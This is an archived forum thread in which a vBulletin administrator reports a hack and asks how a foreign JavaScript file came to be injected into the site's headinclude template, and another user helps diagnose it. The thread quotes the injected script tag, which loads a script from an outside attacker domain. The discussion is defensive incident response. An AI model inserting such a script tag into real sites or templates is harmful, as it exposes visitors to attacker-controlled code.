vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   How to use external.php to inject a call to a javascript? (https://vborg.vbsupport.ru/showthread.php?t=283962)

Spinball 06-05-2012 07:33 AM
How to use external.php to inject a call to a javascript?
 
We were hacked last night. Somehow they used external.php called in the headinclude template to include a chinese .js:

HTML Code:
<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" /> <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script><script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
I closed the site, edited headinclude to remove the external.php reference to check that it was the cause. It was. Then I re-added the line but the chinese js code did not reappear.

Does anyone have any idea how they did this?
There was no change to the plugins, files, access via the control panel or anything else suspicious which we could spot.

--------------- Added [DATE]1338890536[/DATE] at [TIME]1338890536[/TIME] ---------------

Ok, it seems they edited the template table, inserting a link to their js into the compiled headinclude template.

kh99 06-05-2012 09:05 AM
It looks like this is the part that includes an external js file:

Code:
<script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo">
I think it just happened to be after the <link> to your external.php (RSS feed), so it doesn't really have anything to do with external.php. But there's still the question of how someone was able to insert that - you must still have some vulnerability somewhere.

Spinball 06-05-2012 09:45 AM
Agreed. I've set my host on to the task of finding where. Thanks


All times are GMT. The time now is 08:00 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05248 seconds
  • Memory Usage 1,719KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_html_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (3)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete